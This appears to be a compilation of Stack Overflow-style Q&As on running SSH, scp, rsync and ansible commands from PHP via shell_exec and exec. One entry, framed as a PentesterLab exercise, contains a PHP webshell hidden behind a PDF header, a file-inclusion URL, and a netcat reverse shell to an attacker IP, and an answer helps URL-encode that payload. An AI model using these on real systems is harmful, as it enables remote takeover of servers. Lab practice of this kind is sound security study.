I want to use PHP to run a local shell script that contains SSH commands for a server. Inside the script I use ssh to run a command like ls -lart and save the result to a log file on the server, and then scp to copy that remote file to my local host. Something like this:
/// my_local_shell.sh
#!/bin/bash
host=$1
user=$2
port=$3
ssh -p $port $user@$host 'ls -lart >> /home/remote/file.log'
scp -P $port $user@$host:/home/remote/file.log /home/local/file.log
If I run the script from the terminal, user@local_host:~$ ./my_local_shell.sh, everything works just fine. But if I use shell_exec() to execute the script from PHP like this:
/// index.php
$output = shell_exec("my_local_shell.sh 192.168.1.1 root 2222");
echo <pre>$output</pre>;
Nothing is printed on screen and the SSH commands inside the file are not executed.
I know I can use ssh2_shell(), but with it I would have to send the commands from inside the PHP code, and that's not what I want.
I have already given index.php and my_local_shell.sh the permissions they need.
Any ideas how I can do this?
Apparently scp uses some sort of ncurses output that you can't capture, so you could add the -v flag to the scp command in your shell script:
scp -v -P $port $user@$host:/home/remote/file.log /home/local/file.log
Alternatively, since scp returns 0 on success, you could write:
scp -P $port $user@$host:/home/remote/file.log /home/local/file.log && echo Success
As for the PHP, check that you have opening and closing PHP tags and correct your echo statement:
echo "<pre>".$output."</pre>";
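For example, a minimal index.php might look like this (just a sketch; the explicit ./ path, escapeshellarg(), and 2>&1 are additions that are not in the original question):
<?php
// Minimal sketch: run the local script with escaped arguments and print its output.
$cmd = "./my_local_shell.sh "
     . escapeshellarg("192.168.1.1") . " "
     . escapeshellarg("root") . " "
     . escapeshellarg("2222") . " 2>&1";
$output = shell_exec($cmd);
echo "<pre>" . $output . "</pre>";
?>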
I am trying to ssh to a remote server to check whether a specific file exists.
I am able to ssh from the command line, but whenever I try it from my script it does not return anything, and I have to type "exit" and hit Enter to get back to the command line.
Steps:
ssh root@website.com
cd ..
ls *ATMEXTRACT*
I put each of these commands into its own output variable, so they look like this:
$output = shell_exec("ssh root@website.com");
$output1 = shell_exec("cd ..");
$output2 = shell_exec("ls *ATMEXTRACT*");
echo($output2);
I am confused as to why this works directly on the command line but fails in the script. Any help is much appreciated.
Here's what you do interactively:
Run ssh root@website.com in the current shell
Input cd .. in ssh
Input ls *ATMEXTRACT* in ssh
Input exit in ssh, which now exits
Find yourself back in your original shell
Here's what you do in your script:
Run ssh root@website.com in a new shell and exit it
Run cd .. in a second shell and exit it
Run ls *ATMEXTRACT* in a third shell and exit it
You could try to open and interact with an ssh command, but you can also just save yourself the trouble and use ssh's command line feature for specifying the commands to run:
$output = shell_exec("ssh root@website.com 'cd .. && ls *ATMEXTRACT*'");
Be aware that this is likely to fail from a PHP website script because you need to set up an authentication mechanism. This is true even if ssh root@website.com connects without a password when you manually log in to the web server and try it.
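For instance, a sketch of what that might look like once the web server user has its own key (the key path is hypothetical; BatchMode=yes just makes ssh fail instead of prompting for a password):
<?php
// Assumes /var/www/.ssh/id_rsa is readable by the web server user and the
// remote host key is already in that user's known_hosts file.
$cmd = "ssh -i /var/www/.ssh/id_rsa -o BatchMode=yes root@website.com "
     . escapeshellarg('cd .. && ls *ATMEXTRACT*') . " 2>&1";
echo shell_exec($cmd);
?>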
I would recommend using PHP's ssh2 module. It will let you connect to any remote server that is reachable on the appropriate SSH port.
You will need to check whether modules like OpenSSL and ssh2 are installed on your host server.
If not, see https://ehikioya.com/install-ssh2-php/ and install the modules above.
Once these modules are installed and enabled, follow this code:
$server="website.com";
$server_pwd="Password";
//creating connection using server credentials
$connection = ssh2_connect($server, 22);
//authenticating username and password
if(ssh2_auth_password($connection, 'root', $server_pwd)){
echo "connected";
}else{
echo "could not connect to server";
}
$stream = ssh2_exec($connection, "ls /FULL_PATH/ATMEXTRACT"); // run your command here
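Note that ssh2_exec() returns a stream rather than a string, so to actually see whether the file exists you would read that stream, roughly like this:
// Read the command's output from the stream returned by ssh2_exec().
stream_set_blocking($stream, true);
$result = stream_get_contents($stream);
fclose($stream);
echo $result;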
My ansible command won't run using PHP's shell_exec() function, but other commands like ls and pwd work just fine. Note that my PHP code is hosted on an nginx web server, and I am logged in as 'user' on both machines: my local machine and my remote server, which is named 'dockerengine'.
<?php
shell_exec("ansible dockerengine -m shell -a 'echo hello > /home/user/hello.txt'");
?>
When I execute the command ansible dockerengine ... (dockerengine is my remote server) in the terminal, it works perfectly.
Note also that I have configured SSH keys and the sudoers file on my remote server to escalate privileges automatically.
// this code is contained in a file with root privileges, hosted on nginx
<?php shell_exec("ansible dockerengine -m shell -a 'echo hello > /home/user/hello.txt'"); ?>
// this line is written in the sudoers file of my remote server (dockerengine)
user ALL=(ALL) NOPASSWD:ALL
// this line is written in the /etc/ansible/hosts file in my local machine
[docker]
dockerengine ansible_user=user
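A first debugging step (a sketch, not a confirmed fix) is to capture stderr and the exit code from PHP, since under nginx/php-fpm the command runs as the web server user, which may not have the SSH key or HOME directory that your interactive 'user' has:
<?php
// Capture stderr and the exit status so ansible's actual error is visible.
exec("ansible dockerengine -m shell -a 'echo hello > /home/user/hello.txt' 2>&1", $output, $status);
echo "exit status: $status\n";
echo implode("\n", $output);
?>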
With PHP, I am trying to connect to a remote server and exec an rsync command:
$rsync_cmd = 'rsync -P -azv -e "ssh -p 1234" /dir/file.jpg root@remoteserver2:/dir/file.jpg';
exec('sudo ssh -tt root@remoteserver1 '.$rsync_cmd.' 2>&1', $output);
The remote connection works fine, but when I include my rsync command I get a port error: "ssh: connect to host remoteserver2 port 22: Connection refused"
The correct port to use is 1234, and the command works fine in the terminal (shell), but PHP's exec() function doesn't seem to take the "ssh -p 1234" part. Any idea?
Did you test it in Terminal by sshing into remoteserver1, and then executing the rsync command, or by executing the entire ssh-to-rsync command on one line? Because I'm pretty sure doing it in two steps will work, but one step won't. This is because when it's done as one step, the command string is parsed by the local shell (including doing quote and escape interpretation and removal) before it's passed over ssh to the remote shell (which then does another pass of quote and escape interpretation and removal). Those double-quotes in "ssh -p 1234" get parsed and removed by the local shell, so they don't have the intended effect of being parsed and applied by the remote shell.
If I'm right about the problem, the solution is pretty simple: escape the double-quotes. That way the local shell will parse and remove the escapes, and pass the double-quotes through unmolested so the remote shell can see and apply them:
$rsync_cmd = 'rsync -P -azv -e \"ssh -p 1234\" /dir/file.jpg root@remoteserver2:/dir/file.jpg';
exec('sudo ssh -tt root@remoteserver1 '.$rsync_cmd.' 2>&1', $output);
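An alternative to hand-escaping the quotes (a sketch, not from the original answer) is to let PHP quote the whole remote command once with escapeshellarg(), so only the remote shell ever parses the inner double-quotes:
<?php
// escapeshellarg() single-quotes the remote command for the local shell,
// so the inner "ssh -p 1234" reaches the remote shell intact.
$rsync_cmd = 'rsync -P -azv -e "ssh -p 1234" /dir/file.jpg root@remoteserver2:/dir/file.jpg';
exec('sudo ssh -tt root@remoteserver1 ' . escapeshellarg($rsync_cmd) . ' 2>&1', $output);
print_r($output);
?>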
The solution is pretty simple: try dropping the -P flag from the command.
$rsync_cmd = 'rsync -azv -e \"ssh -p 1234\" /dir/file.jpg root@remoteserver2:/dir/file.jpg';
exec('sudo ssh -tt root@remoteserver1 '.$rsync_cmd.' 2>&1', $output);
It should work fine then; with that -P flag it was taking the default port for rsync.
I am doing a PentesterLab exercise.
I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
Now I want to create a reverse shell using nc with the following command, but it does not work properly:
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
If I input commands at 192.168.117.128 and hit Enter, nothing is output.
However, if I run the following command directly in the VM (the target server), it connects to the attacker properly:
/bin/nc 192.168.117.128 8001 -e /bin/bash
The output of the commands is properly echoed at 192.168.117.128.
I wonder why netcat works properly in the VM but does not work through the webshell?
Anyone's help is appreciated, thanks.
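One thing worth checking (an assumption, since the full exercise isn't shown): the cmd value contains spaces and slashes, so it has to be URL-encoded when placed in the query string. PHP's urlencode() shows what should actually be sent:
<?php
// Build the URL-encoded form of the cmd parameter.
$cmd = '/bin/nc 192.168.117.128 8001 -e /bin/bash';
echo 'index.php?page=uploads/1.pdf%00&cmd=' . urlencode($cmd);
?>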
I'm trying to set up a centralized server which is in charge of monitoring my other servers. This centralized server needs to be able to collect particular information/metrics about a specific server (such as the output of df -h and service httpd status), but it also needs to be able to restart Apache if needed.
If it wasn't for the Apache restart, I could write a listening script to provide a means of giving the centralized server the data it needs without having to SSH in. But because I also want it to be able to restart Apache, it needs to be able to log in and initiate scripts through a combination of PHP and Bash.
At the moment, I'm using PHP's shell_exec to execute this (very simple) Bash script:
#!/bin/sh
ssh -i /path/to/keyFile.pem ec2-user@x.x.x.x
I'm accessing the external server (which is an EC2 instance) through a private IP. If I launch this script, I can log in without any problem - the problem comes, however, when I then want to send back the output for commands like the ones I've listed above.
In a Bash script, how would I get back the output of a command like df -h after SSHing into another server? Is this possible?
There is a PECL extension for SSH.
Other than that you'll probably want to either use the &$output parameter of exec() to grab the output:
$output = array();
exec('bash myscript.sh', $output);
print_r($output);
Or use output redirection
$output = '/path/to/output.txt';
exec("bash myscript.sh > $output");
if( file_exists($output) && is_readable($output) ) {
$mydata = file_get_contents($output);
}
And, of course, this all assumes your script looks like what jeroen has in his answer.
You could use:
ssh -i /path/to/keyFile.pem ec2-user@x.x.x.x 'df -h'
or for multiple commands:
ssh -i /path/to/keyFile.pem ec2-user@x.x.x.x 'ls -al ; df -h'
That works from the command line, but I have not tried it via PHP's exec (nor on Amazon, to be honest...).
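Combining this with the exec() approach from the earlier answer, a sketch of the PHP side might look like this (the key path and address are the placeholders from the question):
<?php
// Run the remote commands over ssh and capture each output line in PHP.
$output = array();
exec("ssh -i /path/to/keyFile.pem ec2-user@x.x.x.x 'df -h ; service httpd status' 2>&1", $output);
print_r($output);
?>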
If you're doing ssh I'd suggest phpseclib, a pure PHP SSH implementation. It's a ton more portable than the PECL SSH extension and more reliable too.
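A minimal phpseclib sketch (assuming it is installed via Composer; the class names below are from phpseclib 3, and the key path and address reuse the question's placeholders):
<?php
require 'vendor/autoload.php';

use phpseclib3\Net\SSH2;
use phpseclib3\Crypt\PublicKeyLoader;

// Connect, authenticate with the private key, and run a command.
$key = PublicKeyLoader::load(file_get_contents('/path/to/keyFile.pem'));
$ssh = new SSH2('x.x.x.x');
if (!$ssh->login('ec2-user', $key)) {
    exit('Login failed');
}
echo $ssh->exec('df -h');
?>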